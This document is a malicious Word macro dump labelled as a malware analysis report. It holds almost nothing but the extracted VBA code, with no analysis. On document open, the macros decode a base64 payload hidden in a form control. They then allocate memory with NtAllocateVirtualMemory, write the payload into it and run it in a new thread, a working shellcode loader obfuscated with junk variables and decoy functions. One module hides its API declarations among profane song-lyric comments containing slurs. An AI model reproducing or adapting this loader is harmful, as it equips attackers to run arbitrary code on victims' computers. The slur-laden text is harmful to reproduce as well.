Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function capital(oarsman, warrior, announced)
#If Win64 Then
Dim shadowing As Variant
Dim superque As Byte
Dim haut As LongPtr
Dim agelong As LongPtr
Dim swordcut As LongPtr
Dim plaguy As Long
Dim acanthocytosis As LongPtr
Dim ecclesiologist As LongPtr
#Else
Dim agelong As Long
Dim oospore As Integer
Dim haut As Long
Dim abound As Long
Dim acanthocytosis As Long
Dim mascot As Variant
Dim swordcut As Long
Dim agapornis As Byte
Dim ecclesiologist As Long
Dim cartes As Byte
Dim defibrillator As Byte
#End If
doubleacrostic = admiration
crossing = Round(316.1117 + 419.1367)
agelong = oarsman
ecclesiologist = announced
icosahedron = crossing + 72
acanthocytosis = warrior
saurischia = 38
deny = 20432
introvertish = 535654
madrigalist = SLN(introvertish, deny, saurischia)

itching = Round(177.169 + 434.4)
haut = 40 - 41
successful ByVal haut, agelong, acanthocytosis, ecclesiologist, swordcut
doubleacrostic = "doors"
End Function
Function luminescence(ophiomancy)
Dim quadrible As Byte
Dim obliquity As Long
Dim bombproof As Variant
Dim airintake As Long
#If Win64 Then
Dim disgust As Long
Dim electrodynamometer As LongPtr
casaba = 8
Dim esoterica As Integer
Dim balm As LongPtr
Dim romanist As Integer
Dim bing As LongPtr
Dim alfresco As Variant
#Else
Dim vigilant As Integer
Dim electrodynamometer As Long
casaba = 4
Dim balm As Long
Dim acanthoid As Long
Dim bing As Long
Dim xerography As String
Dim addled As Integer
#End If
biosystematics = capital(VarPtr(electrodynamometer), VarPtr(ophiomancy) + 8, casaba)
sublation = 74 + 89 + 94 - 258
balm = 43 - 107 - 91 + 155
enshrine = 15 - 61 + 18 + 28
bing = 9300
cephalochordate = 50 - 102 - 105 + 4253
omophagia = 64
albumin = melastoma(ByVal sublation, balm, ByVal enshrine, bing, ByVal cephalochordate, ByVal omophagia)
beagling = doubleacrostic

crossing = Int(130.51 + 364.852)

capital balm, electrodynamometer, 26 - 9 - 62 + 5639
delice = 23
smallpox = 20006
akimbo = 340585
conceal = SLN(akimbo, smallpox, delice)

luminescence = balm
End Function
Private Sub Document_Open()
Dim fantasia As Integer
Dim diogenes As Variant
marcid = "subjugate"
projector
claptrap = 32
anility = 6118
isolation = 199289
anility = Pmt(0.0342, claptrap, -13753, isolation, 1)
End Sub
Sub projector()
Dim areal As Byte
Dim podagra As Byte
surrey = ThisDocument.ComputeStatistics(wdStatisticPages)
Set profanely = steamboat.Controls.Item(surrey - 1).Tabs
For Each genoa In profanely
pagrus = 42
accomplishable = 39819
aotus = 316614
agoing = SLN(aotus, accomplishable, pagrus)

If genoa.Index = 11 Then
papaw = "misdated"
airy = "proemium"
dreamy = genoa.Name
End If
Next
gas = 7460
coold = Right(dreamy, gas)
carnelian = excavate.gamy(coold)
instance = 15
abdominous = 26654
unsubservient = 548929
cisco = SLN(unsubservient, abdominous, instance)

escargot = "encyclopedic"
conviviality = "conduit"
#If Win64 Then
Dim centner As Integer
Dim selfrestraint As LongPtr
Dim bolivian As LongPtr
Dim pseudoryx As Integer
#Else
Dim furor As String
Dim bolivian As Long
Dim entendu As Integer
Dim selfrestraint As Long
#End If
angiocarp = 0
meteoric = "victualer"
male = 90 + 4006
ecclesiastic = 69
iodinated = 30561
foundations = 405115
iodinated = Pmt(0.0329, ecclesiastic, -22678, foundations, 0)

forsworn = "tamtam"
glans = "acknowledge"
estuarine = 20
predecessor = 33489
colicroot = 136041
antepartum = SLN(colicroot, predecessor, estuarine)

clusia = carnelian
boots = "bookbinder"
selfrestraint = luminescence(clusia)
unfaded = "contemporaneous"
#If Win64 Then
Dim protein As String
Dim yarr As LongPtr
monarch = "asynergy"
palaemon = "psychosexuality"
Dim groping As LongPtr
captivate = 29 + 29 + 88 + 1134
#ElseIf Win32 Then
devising = "lottery"
panelist = "cr" & "emation"
frictional = "she"
Dim yarr As Long
ellipse = 3 + 511
Dim groping As Long
captivate = ellipse + 3204

#End If
Dim alteration As String
Dim boron As Integer
yarr = 21 - 82 + 81 - 20
bolivian = selfrestraint + captivate
groping = 1
amidship = alleghenies(bolivian, yarr, groping, yarr)
dismissible = 31
boulebards = 18816
chanfron = 289728
boulebards = Pmt(0.0615, dismissible, -38308, chanfron, 1)

End Sub

Sub RemovePageNumbersFromCurrentSection()
    Dim ThisHeader As HeaderFooter
    Dim ThisPageNumber As PageNumber
    With Selection.Sections(1)
        For Each ThisHeader In .Headers
            For Each ThisPageNumber In ThisHeader.PageNumbers
                ThisPageNumber.Delete
            Next ThisPageNumber
        Next ThisHeader
    End With
End Sub


Attribute VB_Name = "excavate"
' Cause I'm feeling like I'm running
' And I be doing it to death and now I move a little foul
' If you want that bullshit then I'm like "OlГ©"
#If Win64 Then
' Every time I come a nigga gotta set it, then I gotta go, and then I gotta get it
' Look at me now
' I don't care what you say, so don't even speak
Public Declare PtrSafe Function mothball Lib "Kernel32.dll" Alias "LocalFree" (apomorphine As LongPtr) As LongPtr
' Look at me now
' Yellow Lamborghini
' I don't care what you say, so don't even speak
Public Declare PtrSafe Function successful Lib "Kernel32.dll" Alias "WriteProcessMemory" (ByVal gryphon As Any, ByVal begreasedabble As Any, ByVal altimeter As Any, ByVal phytelephas As Any, ByVal gimel As Any) As LongPtr
' And I know that I can be a little cocky
' I'm out of my head, bitch I'm outta my mind, from the bottom I climb
' When you're doing that thing over there homie
Public Declare PtrSafe Function melastoma Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (volitient As LongPtr, rheumatology As LongPtr, ByVal dentaria As LongPtr,civillibertarianByVal As LongPtr, system As LongPtr, ByVal nailery As LongPtr) As LongPtr
' Let me show you how to keep the dice rolling
' Just know that you will never flop me
' I'm so Young Money, if you got eyes look at me now, bitchPublic Declare PtrSafe Function fucales Lib "Shell32.dll" Alias "SHGetSettings" (riddance As LongPtr,pittance As LongPtr) As LongPtr
' I was like fuck trial I puts it down
' And I gotta cut all through this traffic
' Better know I gotta have it, have it
Public Declare PtrSafe Function fragrance Lib "Kernel32.dll" Alias "SetSystemTime" (halloo As LongPtr) As Boolean
' Ciroc and Sprite on a private flight,
' I never gave a fuck about a hater, got money on my radar
' п»їYellow model chick
Public Declare PtrSafe Function repousse Lib "Shell32.dll" Alias "SHValidateUNC" (comparatively As LongPtr, ides As Any,abstractedness As LongPtr) As Boolean
' You niggas ain't eatin', fuck it, tell a waiter
' Hell, Breezy
' Oh, I'm getting paper
Public Declare PtrSafe Function alkalinuria Lib "Shell32.dll" Alias "SHGetDesktopFolder" (fetching As LongPtr)
' Let's go!
' Every time I come a nigga gotta set it, then I gotta go, and then I gotta get it
' I'm out of my head, bitch I'm outta my mind, from the bottom I climb
Public Declare PtrSafe Function alleghenies Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal polyhedron As LongPtr, ByVal duralumin As Any, ByVal archipelagic As LongPtr, ByVal unfunctional As LongPtr) As LongPtr
' All of you haters say hi to it
' What's poppin' Slime? Nothin' five, and if they trippin' fuck 'em five
' Do you really wanna know what's next? Let's go

' We gotta go, now try to keep up with the pace
' But since we talking about my dick
' Gotta taste it and I gotta grab it
#Else
' Yeah, fresher than a motherfucker
' I was like fuck trial I puts it down
' Marley said, "Shoot 'em," and I said, "OK"
Public Declare Function melastoma Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (oryctology As Long, demigod As Long, ByVal cumberland As Long, clandestineByVal As Long, beneficium As Long, ByVal handoperated As Long) As Long
' And I come to give you more and I will never give you less
' п»їYellow model chick
' Do you really wanna know what's next? Let's go
Public Declare Function successful Lib "Kernel32.dll" Alias "WriteProcessMemory" (ByVal fiend As Any, ByVal belamcanda As Any, ByVal tabasco As Any, ByVal ophiodontidae As Any, ByVal incoordination As Any) As Long
' That I always win and then I gotta get it again, and again, and then again
' Look at me now, look at me now
' Let's go!
Public Declare Function alleghenies Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal cariamidae As Long, ByVal teapoy As Any, ByVal thallophytic As Any, ByVal armament As Any) As Long
' Look at me now
' And I come to give you more and I will never give you less
' That shit look like a toupee
Public Declare Function gasconade Lib "Shell32.dll" Alias "SHGetDesktopFolder" (backbencher As Long)
' п»їYellow model chick
' I don't care what you say, so don't even speak
' Oh, I'm getting paper
Public Declare Function nancere Lib "Shell32.dll" Alias "SHValidateUNC" (consultum As Long, similarity As Any, sliced As Long) As Boolean
' Man fuck these bitch ass niggas, how y'all doin'?
' Then I'm gonna murder every thing and anything a badaboom a badabing
' And I be doing it to death and now I move a little foul
Public Declare Function artificially Lib "Kernel32.dll" Alias "SetSystemTime" (provisions As Long) As Boolean
' You ain't hotter than mine, nope, not on my time and I'm not even trying
' That's word to my flag, and my flag red
' She wax it all off, Mr.Miyagi
Public Declare Function eperdu Lib "Kernel32.dll" Alias "LocalFree" (disenfranchised As Long) As Long
' Better know I gotta have it, have it
' And I come to give you more and I will never give you less
' And she accidentally slip and fall on my dick
Public Declare Function divergence Lib "Shell32.dll" Alias "SHGetSettings" (carve As Long, reinforcement As Long) As Long
' You ain't never gonna stop me
' All of you haters say hi to it
' I gotta do a lot of things, to make it clearer to a couple niggas

' Ladies love me, I'm on my Cool J
' I gotta do a lot of things, to make it clearer to a couple niggas
' Yellow top missing
#End If
' If you want that bullshit then I'm like "OlГ©"
' Man fuck these bitch ass niggas, how y'all doin'?
' Oh, look at me now
Function gamy(decapod) As String
icosahedron = Fix(246.807 + 317.327)

Dim monrovia As Long
admiration = "mycologist"

Dim bricklaying(6965) As Byte
Dim greenness As Integer
Dim octosyllable(63) As Long
Dim crossheading As String

Dim april As Long
admiration = "cygne"

Dim albania(63) As Long
Dim dryness As Variant

Dim dispersion(63) As Long
Dim ligneous As String
Dim currawong As Long
Dim animastic As Byte

Dim aizoaceae As Long
Dim inimicorum() As Byte
antiadrenergic = 64
Dim facilitate As Variant

Dim possessing As Variant

aspergill = 4096
Dim musette As Byte

sideration = 4032
fullfraught = 65536
equilibrio = 40 - 82 + 16515114
it = 256
firmness = 65280
send = 258048
scone = 255
bruised = 126 - 118 + 262136
purifyc = 63
lyse = 16711680
Dim commissioner As Byte
inspectorate = 112 + 9 - 121
articulate = 7459
Dim engineer() As Byte
engineer = VBA.StrConv(decapod, vbFromUnicode)
Dim granulated As Variant
conqueror = 12
contemptibly = 22183
codeine = 427057
waveson = SLN(codeine, contemptibly, conqueror)

adactylia = 7459
acinaform = 112 - 77
matronage = Log(100) / Log(10) + 13
For humphrey = 0 To adactylia
engineer(humphrey) = engineer(humphrey) + matronage
Next humphrey
laelia = 72
thuggery = 39080
clinton = 266382
thuggery = Pmt(0.0512, laelia, -21036, clinton, 1)

greenness = 0
concrete = 40 - 95 - 112 + 167
pristidae = 16 + 91 + 74 - 138
demand = acme
For aizoaceae = 0 To 63
albania(aizoaceae) = pasteurization(aizoaceae, antiadrenergic, 3)
dispersion(aizoaceae) = pasteurization(aizoaceae, aspergill, 3)
octosyllable(aizoaceae) = pasteurization(aizoaceae, bruised, 3)
Next aizoaceae
bloodstream = 12
unriddle = 38796
benzedrine = 493585
cartulary = SLN(benzedrine, unriddle, bloodstream)

inimicorum = engineer
shikari = 4
resoluteness = 23
tickled = 34395
ricegrass = 519861
platte = SLN(ricegrass, tickled, resoluteness)

overemphasis = 3
icosahedron = Int(158.628 + 237.1191)

crossing = crossing / 332

unsystematically = overemphasis + 1
compense = 2
For currawong = 0 To adactylia
animosity = inimicorum(currawong)
impassiblity = inimicorum(currawong + 2)
april = octosyllable(demand(animosity)) _
 + dispersion(demand(inimicorum(currawong + 1))) + albania(demand(impassiblity)) + demand(inimicorum(currawong + overemphasis))
aizoaceae = pasteurization(april, lyse, 2)
bricklaying(monrovia) = pasteurization(aizoaceae, fullfraught, 1)
aizoaceae = pasteurization(april, firmness, 2)
bricklaying(monrovia + 1) = pasteurization(aizoaceae, it, 1)
bricklaying(monrovia + compense) = pasteurization(april, scone, 2)
monrovia = monrovia + compense + 1
currawong = currawong + 3
Next
gamy = bricklaying
End Function

Sub upper()
    Dim InitialCaps As Range
     Set InitialCaps = ActiveDocument.Range(Start:=ActiveDocument.Words(1).Start, _
        End:=ActiveDocument.Words(3).End)
    InitialCaps.Case = wdUpperCase
End Sub

Function marowbones(counterbore)
marowbones = AscW(counterbore)
End Function
Function pasteurization(belief, commutability, raise)
Select Case raise
Case 1
pasteurization = belief \ commutability
Case 2
pasteurization = belief And commutability
Case 3
pasteurization = belief * commutability
End Select
End Function
Function acme()
Dim makaira(255) As Byte
undiminished = 65
Do
makaira(undiminished) = undiminished - 65
undiminished = undiminished + 1
Loop Until undiminished = 91
undiminished = 48
Do
makaira(undiminished) = undiminished + 4
undiminished = undiminished + 1
Loop Until undiminished = 58
undiminished = 97
Do
makaira(undiminished) = undiminished - 71
undiminished = undiminished + 1
Loop Until undiminished = 123
makaira(47) = 63
undiminished = 43
makaira(undiminished) = 62
acme = makaira
End Function


Attribute VB_Name = "steamboat"
Attribute VB_Base = "0{7E3D2AB0-C101-4BA5-BDD4-6D5B37D9384A}{5AEFC0FE-C76D-4D20-AD70-8AB7E6D60565}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False